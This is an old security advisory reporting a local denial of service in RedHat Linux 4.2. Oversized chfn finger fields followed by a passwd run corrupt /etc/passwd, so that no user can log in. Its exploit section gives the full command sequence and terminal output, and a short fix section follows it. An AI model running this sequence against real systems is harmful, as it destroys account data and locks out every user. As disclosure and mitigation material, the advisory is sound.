COMMAND

    /bin/passwd

SYSTEMS AFFECTED

    Linux (RedHat 4.2)

PROBLEM

    Alex Mottram found possiblebuffer Overrun / DOS in /bin/passwd (at
    least  Redhat  Linux  4.2  from  the  Redhat PowerTools 4.2 CD and
    applied all relevant patches).

    Configuration Information and exploit:

    [alex@machine alex]$ cat /etc/redhat-release
    release 4.2 (Biltmore)

    rpm -qf /usr/bin/chfn
    util-linux-2.5-38

    rpm -qf /usr/bin/passwd
    passwd-0.50-7

    rpm -q pam
    pam-0.57-4

    [alex@machine alex]$ cat /etc/pam.conf
    #
    #  THIS FILE IS NOW OBSOLETE
    #
    #  The contents of this file should be replaced by files in the
    #  /etc/pam.d/ directory.
    #
    #

    [alex@machine alex]$ ls /etc/pam.d/
    chfn    ftp     login   passwd  rlogin  samba   xdm
    chsh    imap    other   rexec   rsh     su

    [alex@machine alex]$ cat /etc/pam.d/chfn
    #%PAM-1.0
    auth       required     /lib/security/pam_pwdb.so shadow nullok
    account    required     /lib/security/pam_pwdb.so
    password   required     /lib/security/pam_cracklib.so
    password   required     /lib/security/pam_pwdb.so shadow nullok
    use_authtok
    session    required     /lib/security/pam_pwdb.so

    [alex@machine alex]$ cat /etc/pam.d/passwd
    #%PAM-1.0
    auth       required     /lib/security/pam_pwdb.so shadow nullok
    account    required     /lib/security/pam_pwdb.so
    password   required     /lib/security/pam_cracklib.so
    password   required     /lib/security/pam_pwdb.so use_authtok nullok

    [alex@machine /tmp]$ tail /etc/passwd
    alex:x:500:500:alex,,,,:/home/alex:/bin/bash
    zane:x:501:501:zane,,,,:/home/zane:/bin/bash
    someone:x:502:502::/home/someone:/bin/bash

    [alex@machine /tmp]$ cat pass
    #this test has 11719 bytes of the sequence "0123456789", Xs work just as well.
    export -p BUFF='[many Xs, 10k is more than plenty, 2k should work]'
    /bin/bash

    [alex@machine /tmp]$ ./pass
    [alex@machine /tmp]$ chfn -f $BUFF -p $BUFF -h $BUFF -o $BUFF
    Changing finger information for alex.
    Password:
    Finger information changed.
    [alex@machine /tmp]$ wc /etc/passwd
	 26      29    2068 /etc/passwd

    ** At this point, the passwd entry for 'alex' is >48k long **

    [alex@machine alex]$ passwd
    Changing password for alex
    (current) UNIX password:
    New UNIX password:
    Segmentation fault

    ** LOGIN AS SECOND USER **
    [zane@machine zane]$ passwd
    Changing password for zane
    (current) UNIX password:
    New UNIX password:
    Retype new UNIX password:
    passwd: all authentication tokens updated successfully

    'passwd' just  snipped our  one big  line into  nice 8k chunks and
    created some junk passwd file entries.

    [zane@machine zane]$ wc /etc/passwd
	 31      34   47829 /etc/passwd

    [zane@machine zane]$ su someuser
    su: user someuser does not exist
    [zane@machine zane]$ su alex
    su: user alex does not exist
    [zane@machine zane]$ su zane
    su: user zane does not exist

    Other services checked were equally screwed.  (ftp, pop-3, etc...)

SOLUTION

    Remove suid  bit from  chfn to  disable users  to use  this stuff.
    There was  plenty of  bugs in  chfn so  it's not  paranoid to even
    delete the file.  Changing info is admin's job and not user's.

    In OpenBSD, they constrain the password line to be 1023 characters
    long (_including_  expansion in  the gecos  field of  all cases of
    '&' -> username).